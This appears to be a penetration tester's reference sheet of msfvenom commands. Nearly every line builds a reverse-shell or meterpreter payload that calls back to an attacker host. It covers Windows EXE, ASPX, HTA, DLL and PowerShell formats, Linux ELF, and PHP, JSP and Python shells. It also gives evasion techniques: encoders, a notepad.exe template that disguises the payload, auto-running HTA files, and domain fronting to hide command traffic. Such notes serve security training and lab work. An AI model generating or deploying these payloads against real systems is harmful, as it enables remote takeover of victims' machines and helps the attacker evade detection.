Backlink: reference-notes-readme


Command Example

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.172 LPORT=443 EXITFUNC=thread -f aspx -o iistest.aspx

General Flags

Encoders

-e x86/shikata_ga_nai

-e x64/zutto_dekiru

Templates

Use an exe file saved locally as a template. Output will share thumbnail image, metadata, etc.

-x notepad.exe

Available Payloads

Windows

Payloads

Note: All payloads with x64 are 64-bit, all without are 32-bit

windows/shell_reverse_tcp

windows/x64/shell_reverse_tcp

windows/meterpreter/reverse_https

windows/x64/meterpreter/reverse_https

Formats

Compiled

EXE: -f exe -o test.exe     This is a directly executable binary.

ASP: -f asp -o iistest.asp     Mostly used for IIS Web servers.

ASPX: -f aspx -o iistest.aspx     Also mostly used for IIS Web servers.

HTA: -f hta-psh -o file.hta     Submitting HTA files to an end-user will auto-run if they open it.

DLL: -f dll -o file.dll

    Used when implementing DLL injection.

Raw

C#: -f csharp

    Used to put in to C# code, usually when building malicious dll or bin in VS, then DotNetToJScript.

PS: -f powershell

    Used when placing shellcode directly in .ps1 script, usually with macro runner.

Linux

Payloads

linux/x86/shell_reverse_tcp

linux/x64/shell_reverse_tcp

linux/x64/meterpreter/reverse_tcp

Formats

ELF: -f elf -o file

Script Language Payloads

Python

msfvenom -p python/meterpreter/reverse_https LHOST=192.168.49.205 LPORT=443 -f raw > met.py

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl

Java

Payloads

java/jsp_shell_reverse_tcp

Formats

WAR: -f war > shell.war

JavaScript

Payloads

linux/x86/shell_reverse_tcp

windows/x64/shell_reverse_tcp

Formats

JS_LE: CMD=/bin/bash -f js_le -e generic/none

Command Example

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.205 LPORT=443 CMD=/bin/bash -f js_le -e generic/none

PHP

Payloads

php/shell_reverse_tcp

Formats

PHP: -f raw > shell.php


Domain Fronting

msfvenom -p windows/x64/meterpreter_reverse_https HttpHostHeader=cdn123.offseccdn.com LHOST=good.com LPORT=443 -f exe > https-df.exe

The above probably isn't useful anymore since Azure, the only Cloud provider that supported this type of attack, killed it in March 2021.